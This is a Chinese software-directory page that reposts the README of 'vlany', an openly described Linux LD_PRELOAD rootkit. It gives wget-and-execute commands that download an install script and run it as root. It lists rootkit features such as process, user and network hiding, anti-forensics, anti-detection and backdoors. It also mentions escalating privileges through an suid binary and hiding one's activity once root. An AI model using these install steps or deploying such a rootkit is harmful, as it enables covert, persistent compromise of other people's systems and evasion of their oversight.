• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号

mempodippy/vlany: Linux LD_PRELOAD rootkit (x86 and x86_64 architectures)

原作者: [db:作者] 来自: 网络 收藏 邀请

开源软件名称(OpenSource Name):

mempodippy/vlany

开源软件地址(OpenSource Url):

https://github.com/mempodippy/vlany

开源编程语言(OpenSource Language):

C 76.5%

开源软件介绍(OpenSource Introduction):

VLANY IS NO LONGER MAINTAINED.

https://github.com/naworkcaj/bdvl IS. PLEASE REFER TO THAT FOR CONSTANT UPDATES.

vlany (wiki)

vlany is a Linux LD_PRELOAD rootkit.

Installing

  • vlany's quick_install.sh script is the fastest/easiest method of installation.
    root@vlany:~# wget https://gist.githubusercontent.com/mempodippy/d93fd99164bace9e63752afb791a896b/raw/6b06d235beac8590f56c47b7f46e2e4fac9cf584/quick_install.sh -O /tmp/quick_install.sh && chmod +x /tmp/quick_install.sh && /tmp/quick_install.sh

    The quick_install.sh script automatically downloads the latest version of vlany from this repository, untars the archive, then executes the regular installation script from a new random directory in /tmp/. By default, the quick_install.sh script removes the new directory once execution has completely finished.

  • It's very simple to install vlany onto a sytem as it comes with an automated install script.
    To install vlany you want to first download it from our GitHub ( Always up to date and trusted )
    root@vlany:~# wget https://github.com/mempodippy/vlany/archive/master.tar.gz && tar xvpfz master.tar.gz

  • Once it's downloaded you just have to run install.sh inside vlany-master.
    root@vlany:~# cd vlany-master && ./install.sh
    By default this will prompt you with a tui installation but if cli is prefered you can use the --cli argument to invoke a similar cli installation.

ASCIICAST OF INSTALLATION

Regular tui installation on a Debian 8 box using an suid binary to escalate privileges from a tmp user. In a real life scenario, you'll want to play with some environment variables to prevent anyone from seeing your activity when root.

Downloads

quick_install.sh
vlany.tar.gz
populated const.h (after config.py execution)

Features

  • Process hiding
  • User hiding
  • Network hiding
  • LXC container
  • Anti-Debug
  • Anti-Forensics
  • Persistent (re)installation & Anti-Detection
  • Dynamic linker modifications
  • Backdoors
  • vlany-exclusive commands

Known bugs

Any bugs listed here will be present until a resolve has been reached. If a bug has been reported as an issue, the corresponding issue will also be linked in the bug listing. Should a bug be resolved, the listing will be removed from here, and if any issue is still open pertaining to the bug, it will be closed.

Serious bugs

  1. There is currently an experimental reboot brick fix. Some systems will brick, others won't. Please report any systems that brick on reboot as an issue, and give the circumstances of the vlany installation in the report. Take a look at the Issues page to see if a similar issue has already been submitted.
  2. vlany fails to install correctly on anything above CentOS 6.6.

In-depth README.txt (very detailed but not maintained)

NOTE: vlany is in active development. Changes are constantly being made to this repository, so beware that vlany is very experimental.




鲜花

握手

雷人

路过

鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
上一篇:
clearlinux/dockerfiles: Clear Linux-based Docker containers发布时间:2022-08-16
下一篇:
alexanderk23/gluqlo: Gluqlo: Fliqlo for Linux发布时间:2022-08-16
热门推荐
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap